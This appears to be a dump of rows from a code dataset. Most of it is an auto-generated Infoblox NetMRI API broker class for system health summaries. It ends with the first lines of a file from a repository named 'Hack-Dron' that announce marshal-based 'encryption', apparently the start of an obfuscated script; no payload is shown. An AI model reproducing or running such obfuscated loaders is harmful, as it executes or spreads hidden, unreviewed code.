| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ed04d8b5fb490a74d198e21b7563fe486ea80548
| 48,186
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/system_health_summary_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/system_health_summary_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/system_health_summary_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class SystemHealthSummaryBroker(Broker):
controller = "system_health_summaries"
def show(self, **kwargs):
"""Shows the details for the specified system health summary.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier of the system health summary.
:type id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summary: The system health summary identified by the specified id.
:rtype system_health_summary: SystemHealthSummary
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available system health summaries. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: No description is available for id.
:type id: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SystemHealthSummary. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summaries: An array of the SystemHealthSummary objects that match the specified input criteria.
:rtype system_health_summaries: Array of SystemHealthSummary
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available system health summaries matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param category: No description is available for category.
:type category: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param datasource_id: No description is available for datasource_id.
:type datasource_id: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param diagnostic: No description is available for diagnostic.
:type diagnostic: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param entry_type: No description is available for entry_type.
:type entry_type: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: No description is available for id.
:type id: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param message: No description is available for message.
:type message: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param message_code: No description is available for message_code.
:type message_code: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param silenceable_ind: No description is available for silenceable_ind.
:type silenceable_ind: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param silenced_ind: No description is available for silenced_ind.
:type silenced_ind: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param status: No description is available for status.
:type status: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param subcategory: No description is available for subcategory.
:type subcategory: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: No description is available for timestamp.
:type timestamp: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param updated_at: No description is available for updated_at.
:type updated_at: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param visibility: No description is available for visibility.
:type visibility: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SystemHealthSummary. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against system health summaries, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: category, datasource_id, diagnostic, entry_type, id, message, message_code, silenceable_ind, silenced_ind, status, subcategory, timestamp, updated_at, visibility.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summaries: An array of the SystemHealthSummary objects that match the specified input criteria.
:rtype system_health_summaries: Array of SystemHealthSummary
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available system health summaries matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: category, datasource_id, diagnostic, entry_type, id, message, message_code, silenceable_ind, silenced_ind, status, subcategory, timestamp, updated_at, visibility.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_category: The operator to apply to the field category. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. category: No description is available for category. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_category: If op_category is specified, the field named in this input will be compared to the value in category using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_category must be specified if op_category is specified.
:type val_f_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_category: If op_category is specified, this value will be compared to the value in category using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_category must be specified if op_category is specified.
:type val_c_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_datasource_id: The operator to apply to the field datasource_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. datasource_id: No description is available for datasource_id. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_datasource_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_datasource_id: If op_datasource_id is specified, the field named in this input will be compared to the value in datasource_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_datasource_id must be specified if op_datasource_id is specified.
:type val_f_datasource_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_datasource_id: If op_datasource_id is specified, this value will be compared to the value in datasource_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_datasource_id must be specified if op_datasource_id is specified.
:type val_c_datasource_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_diagnostic: The operator to apply to the field diagnostic. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. diagnostic: No description is available for diagnostic. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_diagnostic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_diagnostic: If op_diagnostic is specified, the field named in this input will be compared to the value in diagnostic using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_diagnostic must be specified if op_diagnostic is specified.
:type val_f_diagnostic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_diagnostic: If op_diagnostic is specified, this value will be compared to the value in diagnostic using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_diagnostic must be specified if op_diagnostic is specified.
:type val_c_diagnostic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_entry_type: The operator to apply to the field entry_type. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. entry_type: No description is available for entry_type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_entry_type: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_entry_type: If op_entry_type is specified, the field named in this input will be compared to the value in entry_type using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_entry_type must be specified if op_entry_type is specified.
:type val_f_entry_type: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_entry_type: If op_entry_type is specified, this value will be compared to the value in entry_type using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_entry_type must be specified if op_entry_type is specified.
:type val_c_entry_type: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: No description is available for id. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_message: The operator to apply to the field message. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. message: No description is available for message. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_message: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_message: If op_message is specified, the field named in this input will be compared to the value in message using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_message must be specified if op_message is specified.
:type val_f_message: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_message: If op_message is specified, this value will be compared to the value in message using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_message must be specified if op_message is specified.
:type val_c_message: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_message_code: The operator to apply to the field message_code. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. message_code: No description is available for message_code. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_message_code: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_message_code: If op_message_code is specified, the field named in this input will be compared to the value in message_code using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_message_code must be specified if op_message_code is specified.
:type val_f_message_code: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_message_code: If op_message_code is specified, this value will be compared to the value in message_code using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_message_code must be specified if op_message_code is specified.
:type val_c_message_code: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_silenceable_ind: The operator to apply to the field silenceable_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. silenceable_ind: No description is available for silenceable_ind. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_silenceable_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_silenceable_ind: If op_silenceable_ind is specified, the field named in this input will be compared to the value in silenceable_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_silenceable_ind must be specified if op_silenceable_ind is specified.
:type val_f_silenceable_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_silenceable_ind: If op_silenceable_ind is specified, this value will be compared to the value in silenceable_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_silenceable_ind must be specified if op_silenceable_ind is specified.
:type val_c_silenceable_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_silenced_ind: The operator to apply to the field silenced_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. silenced_ind: No description is available for silenced_ind. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_silenced_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_silenced_ind: If op_silenced_ind is specified, the field named in this input will be compared to the value in silenced_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_silenced_ind must be specified if op_silenced_ind is specified.
:type val_f_silenced_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_silenced_ind: If op_silenced_ind is specified, this value will be compared to the value in silenced_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_silenced_ind must be specified if op_silenced_ind is specified.
:type val_c_silenced_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_status: The operator to apply to the field status. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. status: No description is available for status. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_status: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_status: If op_status is specified, the field named in this input will be compared to the value in status using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_status must be specified if op_status is specified.
:type val_f_status: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_status: If op_status is specified, this value will be compared to the value in status using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_status must be specified if op_status is specified.
:type val_c_status: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_subcategory: The operator to apply to the field subcategory. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. subcategory: No description is available for subcategory. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_subcategory: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_subcategory: If op_subcategory is specified, the field named in this input will be compared to the value in subcategory using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_subcategory must be specified if op_subcategory is specified.
:type val_f_subcategory: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_subcategory: If op_subcategory is specified, this value will be compared to the value in subcategory using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_subcategory must be specified if op_subcategory is specified.
:type val_c_subcategory: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_timestamp: The operator to apply to the field timestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. timestamp: No description is available for timestamp. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_timestamp: If op_timestamp is specified, the field named in this input will be compared to the value in timestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_timestamp must be specified if op_timestamp is specified.
:type val_f_timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_timestamp: If op_timestamp is specified, this value will be compared to the value in timestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_timestamp must be specified if op_timestamp is specified.
:type val_c_timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: No description is available for updated_at. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified.
:type val_f_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified.
:type val_c_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_visibility: The operator to apply to the field visibility. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. visibility: No description is available for visibility. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_visibility: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_visibility: If op_visibility is specified, the field named in this input will be compared to the value in visibility using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_visibility must be specified if op_visibility is specified.
:type val_f_visibility: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_visibility: If op_visibility is specified, this value will be compared to the value in visibility using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_visibility must be specified if op_visibility is specified.
:type val_c_visibility: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SystemHealthSummary. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summaries: An array of the SystemHealthSummary objects that match the specified input criteria.
:rtype system_health_summaries: Array of SystemHealthSummary
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def tree(self, **kwargs):
"""Get tree of health statuses
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: Search string
:type query: String
**Outputs**
"""
return self.api_request(self._get_method_fullname("tree"), kwargs)
def storage_data(self, **kwargs):
"""Available disk space data for 2 last weeks
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param datasource_id: Datasource ID
:type datasource_id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("storage_data"), kwargs)
def silence(self, **kwargs):
"""Silence/Unsilence warnings
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: Id of warning
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("silence"), kwargs)
def overall_system_health(self, **kwargs):
"""Delivers a one-line summary of system health.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param include_silenced_ind: Indicates whether to include IDs that have been silenced by the user.
:type include_silenced_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param include_closed_ind: Indicates whether to include IDs that have been hidden for the user's session.
:type include_closed_ind: Boolean
**Outputs**
"""
return self.api_request(self._get_method_fullname("overall_system_health"), kwargs)
def hide_overall_system_health_bar(self, **kwargs):
"""Hides the system health status bar for the current unhealthy IDs.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("hide_overall_system_health_bar"), kwargs)
def license_issue_summary(self, **kwargs):
"""Delivers a one-line summary of platform limit issues.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param include_closed_ind: Indicates whether to include IDs that have been hidden for the user's session.
:type include_closed_ind: Boolean
**Outputs**
"""
return self.api_request(self._get_method_fullname("license_issue_summary"), kwargs)
def hide_license_issue_bar(self, **kwargs):
"""Hides the platform limit issue bar for the current issue IDs.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("hide_license_issue_bar"), kwargs)
| 50.24609
| 583
| 0.605446
| 6,112
| 48,186
| 4.683246
| 0.048429
| 0.069871
| 0.045416
| 0.059391
| 0.920661
| 0.915665
| 0.904835
| 0.874755
| 0.852641
| 0.830108
| 0
| 0.003315
| 0.311273
| 48,186
| 959
| 584
| 50.24609
| 0.859192
| 0.800627
| 0
| 0
| 0
| 0
| 0.082213
| 0.060496
| 0
| 0
| 0
| 0
| 0
| 1
| 0.44
| false
| 0
| 0.04
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
ed18544b2f1154a7bae4ed059c4d50c70a394f72
| 5,433
|
py
|
Python
|
Data/Control.py
|
menang22/Hack-Dron
|
f0465d1a967a12225dd60a3825f318dcbbf653a5
|
[
"MIT"
] | 2
|
2021-03-01T18:29:10.000Z
|
2021-03-01T18:34:25.000Z
|
Data/Control.py
|
menang22/Hack-Dron
|
f0465d1a967a12225dd60a3825f318dcbbf653a5
|
[
"MIT"
] | null | null | null |
Data/Control.py
|
menang22/Hack-Dron
|
f0465d1a967a12225dd60a3825f318dcbbf653a5
|
[
"MIT"
] | null | null | null |
#!/python3
#encypt by WGIS
import marshal
